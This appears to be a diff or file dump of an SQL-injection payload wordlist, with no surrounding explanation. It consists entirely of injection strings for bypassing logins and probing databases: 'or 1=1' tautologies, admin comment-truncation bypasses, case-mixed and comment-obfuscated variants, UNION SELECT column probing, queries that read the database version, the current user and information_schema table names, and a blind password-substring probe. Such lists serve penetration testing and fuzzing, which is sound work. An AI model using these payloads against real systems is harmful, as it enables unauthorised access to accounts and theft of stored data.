")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
